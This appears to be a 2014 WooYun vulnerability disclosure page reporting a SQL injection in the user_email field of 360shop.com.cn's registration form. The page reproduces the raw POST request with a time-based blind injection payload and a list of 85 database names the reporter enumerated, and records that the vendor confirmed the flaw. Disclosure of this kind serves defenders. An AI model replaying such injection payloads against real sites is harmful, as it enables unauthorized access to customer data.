360shop官网post注入一枚(有不少用户信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048476

漏洞标题：360shop官网post注入一枚(有不少用户信息)

漏洞作者： PgHook

提交时间：2014-01-10 14:56

修复时间：2014-02-24 14:56

公开时间：2014-02-24 14:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-01-10：细节已通知厂商并且等待厂商处理中
2014-01-13：厂商已经确认，细节仅向厂商公开
2014-01-23：细节向核心白帽子及相关领域专家公开
2014-02-02：细节向普通白帽子公开
2014-02-12：细节向实习白帽子公开
2014-02-24：细节向公众公开

简要描述：

..........

详细说明：

漏洞网站：http://www.360shop.com.cn
post信息：

POST /register.php HTTP/1.1
Content-Length: 254
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.360shop.com.cn:80/
Cookie: 360shop_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 360shop_sid=41122db3f1f267c38aa9a68ff9158120; 360shop_validity_time=0; PHPSESSID=l7498dqlinampsn9mga7gdlqi2
Host: www.360shop.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Accept: */*
action=register&code_sn=94102&isagreement=1&password=g00dPa%24%24w0rD&register=1&repassword=g00dPa%24%24w0rD&user_email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

user_email存在漏洞

漏洞证明：

available databases [85]:
[*] 360_89lou
[*] 360_89lou_0818
[*] 360_canglong
[*] 360_canglong_0927
[*] 360_canglong_1104
[*] 360_canglong_1112
[*] 360_crm
[*] 360_help
[*] 360_help_hicloud
[*] 360_help_tltw
[*] 360_hotel
[*] 360_ncom
[*] 360_newshop
[*] 360_qiboot
[*] 360_tcrm
[*] 360_www_bandao_com
[*] 3800_www_tomatoc_com
[*] 51_ml
[*] 8800_www_mylianmei_com
[*] 8800_www_onespacetwofoot_com
[*] 8800_www_yibuerzu_com
[*] a_men_discuz
[*] a_myzs
[*] a_myzs_20120401
[*] a_sanude
[*] a_skpifa_wordpress
[*] a_tltest
[*] abc_appaz
[*] abc_appaz_0613
[*] abc_appaz_20111031
[*] abc_appaz_fx
[*] abc_lsa
[*] abc_taodiantong
[*] ali_glsp8_com
[*] ali_goucoo_com
[*] ali_shuinianhua_com
[*] aliefday_360shop_cc
[*] alihanxianzi_360shop_cc
[*] alilgg360_360shop_cc
[*] app_01008034
[*] app_02263
[*] app_02632
[*] app_02633
[*] app_02634
[*] app_02635
[*] app_0618
[*] app_1301
[*] app_1307525362
[*] app_2370
[*] app_2371
[*] app_2447
[*] app_2449
[*] app_3803
[*] app_4370
[*] app_5163
[*] app_6395
[*] app_7287
[*] app_8298
[*] app_9954
[*] app_9954_20120829
[*] badbuildfs
[*] bugfree2
[*] bz_meimeivip_com
[*] bzelf520_360shop_cc
[*] bzmagic_szjieli_com
[*] bzmimidf_360shop_cc
[*] daohang_171688_cn
[*] daohang_wddl_cn
[*] information_schema
[*] mysql
[*] netdesk
[*] son1308030959
[*] son1318995965
[*] son2633
[*] son2634
[*] son2638
[*] v2_lovelens_com
[*] v2_mingdi_net
[*] v2powerfeel_360shop_cc
[*] v2soso2099_360shop_cc
[*] v2xinyi521_360shop_cc
[*] www_myvip8_com
[*] www_yibuerzu_com
[*] zjtggroup
[*] zjtggroup_0619

修复方案：

........

版权声明：转载请注明来源 PgHook@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-01-13 10:50

厂商回复：

谢谢您提供信息！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048476

漏洞标题：360shop官网post注入一枚(有不少用户信息)

相关厂商：杭州启博科技

漏洞作者： PgHook

提交时间：2014-01-10 14:56

修复时间：2014-02-24 14:56

公开时间：2014-02-24 14:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 PgHook@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048476

漏洞标题：360shop官网post注入一枚(有不少用户信息)

相关厂商：杭州启博科技

漏洞作者： PgHook

提交时间：2014-01-10 14:56

修复时间：2014-02-24 14:56

公开时间：2014-02-24 14:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-048476"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 PgHook@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：